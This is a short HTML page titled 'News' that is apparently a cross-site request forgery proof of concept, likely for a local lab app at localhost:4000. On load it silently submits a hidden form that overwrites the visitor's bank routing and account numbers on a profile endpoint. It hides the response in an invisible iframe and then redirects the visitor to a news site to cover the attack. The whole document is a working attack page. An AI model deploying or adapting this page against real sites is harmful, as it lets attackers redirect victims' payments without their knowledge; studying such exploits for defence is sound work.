<!doctype html>
<html lang="en" ng-app>
  <head>
    <title>News</title>
  </head>
  <body onload="document.getElementById('form').submit();">
    <h1>Loading...</h1>
    <form id="form" method="POST" action="http://localhost:4000/profile" target="iframeHidden">
      <input type="hidden" name="bankRouting" value="88465#" />
      <input type="hidden" name="bankAcc" value="95468#" />
    </form>
    <iframe name="iframeHidden" style="width:0; height:0; border:0; border:none" onload="send()"></iframe>
    <script>
      function send() {
        setTimeout("location.replace('https://www.marketwatch.com/')", 20);
      }
    </script>
  </body>
</html>
